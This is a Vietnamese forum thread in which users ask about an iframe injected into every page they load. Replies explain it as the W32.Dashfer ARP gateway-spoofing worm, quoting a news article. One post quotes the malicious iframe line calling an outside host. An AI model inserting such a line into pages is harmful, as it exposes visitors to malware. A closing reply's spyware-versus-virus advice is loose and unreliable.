Đang gặp vấn đề với mấy con virus kiểu mới là khi vào trang web nào đấy nó đều liên kết tới 1 trang là xxx.xnibi.com. Tra trang này ra thì là 1 trang của trung quốc, thấy rank alexa của nó tăng đáng ngờ trong 1 tuần lại đây. view source bất cứ trang web nào của mình thì thấy dòng này <iframe src=http://w2.xnibi.com/index.gif width=100 height=1></iframe> thử vào các trang (http://www.ictvietnam.net (http://www.ictvietnam.net/), http://dantri.com.vn (http://dantri.com.vn/) ....) đều bị
Xin mọi người cho biết đó là gì? Tại sao source page của các trang này có dòng như vậy? Tác dụng của nó là gì? Liệu có phải trang có dòng như vậy đã bị nhiễm virus không? Chân thành cảm ơn!

Đúng là chỗ mình cũng đang bị con này, nó bắt đòi cài thêm cái activex nữa, chưa lần ra nguyên nhân từ đâu vì có máy bị máy không

Đây là dòng virus Dashfer chuyên gửi gói ARP để giả mạo địa chỉ gateway.
2 bạn thử tìm xem nguồn phát từ máy nào trong mạng dính virus. Khử ở đấy đi là xong


Nhiều website gặp nỗi oan gia vì virus giả mạo gateway
"Giống như một người bị dính dầu gió trên mũi, đi đâu cũng ngửi thấy và nghĩ xunh quanh có ai đó bôi dầu, dòng virus W32.Dashfer nhiễm vào PC sẽ khiến nạn nhân truy cập site nào cũng tưởng trang này bị chèn mã độc", chuyên gia BKIS Vũ Ngọc Sơn mô tả loại sâu đang có mức lây lan lớn nhất ở VN.
> Gần 60 nghìn PC trong nước dính virus giả mạo gateway (http://www.vnexpress.net/GL/Vi-tinh/Hacker-Virus/2007/12/3B9FDC84/)
http://www.vnexpress.net/Files/Subject/3B/A0/33/E2/virus.jpgQuá trình chèn banner, popup của virus giả mạo gateway. Ảnh: BKIS.
Thực tế là virus nằm trong một hoặc nhiều máy tính mà máy nạn nhận có cùng kết nối mạng. Với phương thức "tung hỏa mù", loại virus này khi chui được vào một PC sẽ gửi broadcast gói tin theo giao thức ARP (giao thức phân giải địa chỉ) tới tất cả các máy tính khác trong cùng mạng để mạo danh là Gateway của hệ thống. Các kết nối ra Internet của tất cả các máy tính trong mạng lúc này sẽ bị lừa đi qua gateway giả mạo trước, rồi sau đó mới tới gateway thật. Bằng cách này, mã độc sẽ kiểm soát được toàn bộ quá trình trao đổi dữ liệu và chèn thêm iframe có chứa mã độc vào nội dung các trang web trước khi chúng được trả về cho máy tính của người sử dụng. "Đây chính là cơ chế khiến người sử dụng, nếu bị nhiễm virus thì cứ truy cập vào các trang web... đều thấy có hiện tượng có vẻ như gặp virus", ông Sơn nhận định.
(http://www.vnexpress.net/GL/Vi-tinh/Hacker-Virus/2007/11/3B9FC0AC/) (http://www.vnexpress.net/GL/Vi-tinh/2007/11/3B9FC9D8/) (http://www.vnexpress.net/GL/Vi-tinh/Hacker-Virus/2007/11/3B9FBDCC/)
Trung tâm BKIS cho biết mới đây, cả trăm máy tính của Văn phòng một cơ quan Bộ đã bị dính một biến thể của loại virus này có tên là W32.FialaM. Cũng chính mã độc này đang khiến Yahoo Messenger bị hàm oan vì có dư luận cho rằng banner quảng cáo phía dưới phần mềm chat này đã bị cài virus làm lây nhiễm sang nhiều người. "Thực ra, Yahoo Messenger không liên quan đến sự việc này, do hệ thống mạng của người sử dụng đang bị virus, nên họ vào bất cứ trang web nào đều thấy bị chèn iframe chứa mã độc. Login vào Yahoo Messenger thì cũng sẽ thấy như vậy", chuyên gia của BKIS khẳng định.
W32.FialaM là biến thể của dòng virus W32.Dashfer, thuộc loại virus giả mạo gateway có xuất xứ từ Trung Quốc. Họ sâu này xuất hiện từ tháng 12/2007 và cho tới thời điểm hiện nay liên tục nằm trong Top 5 những virus lây lan nhiều nhất hằng tháng.

cám ơn nhatphuc, đã tìm ra nguồn phát tán virus rồi.

trùi ui con này là spyware mà sao cứ bảo mấy con đó là virus thế nhỉ
khi bình thường máy bạn có triệu chứng bất thường nhảy lên những trang wed lạ của tây tàu thì không biết vì tùy từng người vào những trang nào và bị dính con nào đó nhất là wed đen :P:P thì đó là spyware chứ không phải virus dùng phần mềm diệt virus chưa chắc đã diệt hết được đâu vì vậy phải dùng phần mềm diệt spyware để diệt là hết
có một số con nó khi ấn vào 1 foder bất ký nó hiện lên 1 trang wed bảo là foder đã dính virus và cần dow chương trình này về để diệt thì nhớ đó chính là virus luôn và nếu cài ra thì hahaha cài lại máy đi là vừa vì một khi đã tự động cài virus vào máy qua phần mềm như nói trên thì khả năng diệt tận gốc là rất khó :P:P